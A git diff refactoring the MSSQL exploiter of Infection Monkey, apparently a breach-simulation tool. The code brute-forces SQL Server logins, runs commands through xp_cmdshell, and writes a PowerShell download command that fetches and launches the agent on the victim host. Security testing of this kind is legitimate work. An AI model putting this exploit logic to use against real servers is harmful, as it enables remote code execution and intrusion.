diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 8b378f418..f80dc3db6 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -37,7 +37,6 @@ class MSSQLExploiter(HostExploiter): XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_END = "'" EXPLOIT_COMMAND_PREFIX = "{payload_file_path}" MONKEY_DOWNLOAD_COMMAND = ( "powershell (new-object System.Net.WebClient)." "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" @@ -133,9 +132,8 @@ class MSSQLExploiter(HostExploiter): sleep(MSSQLExploiter.QUERY_BUFFER) def upload_monkey(self, monkey_path_on_victim: PureWindowsPath): - monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) + self._write_download_command_to_batch_file(monkey_path_on_victim) self.run_payload_file() - self.add_executed_cmd(monkey_download_command.command) def remove_temp_dir(self): # Remove temporary dir we stored payload at @@ -159,10 +157,24 @@ class MSSQLExploiter(HostExploiter): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath): - monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) - self.run_mssql_command(monkey_download_command) - return monkey_download_command + def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath): + agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( + http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) + ) + self._write_command_to_batch_file(agent_download_command) + + def _write_command_to_batch_file(self, command: str): + write_to_file_command = f"{self.payload_file_path}" + self._run_mssql_command(write_to_file_command) + + # Note: This is a strangler used to replace self.run_mssql_command() + def _run_mssql_command(self, command: str): + logger.debug(f"Running command on SQL Server: {command}") + + self.cursor.execute(f"xp_cmdshell '{command}'") + self.add_executed_cmd(command) + + sleep(MSSQLExploiter.QUERY_BUFFER) def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): # Form monkey's launch command @@ -177,18 +189,6 @@ class MSSQLExploiter(HostExploiter): suffix=suffix, ) - def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath): - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( - http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) - ) - prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX - suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format( - payload_file_path=self.payload_file_path - ) - return MSSQLLimitedSizePayload( - command=monkey_download_command, suffix=suffix, prefix=prefix - ) - def brute_force(self, host, port, users_passwords_pairs_list): """ Starts the brute force connection attempts and if needed then init the payload process.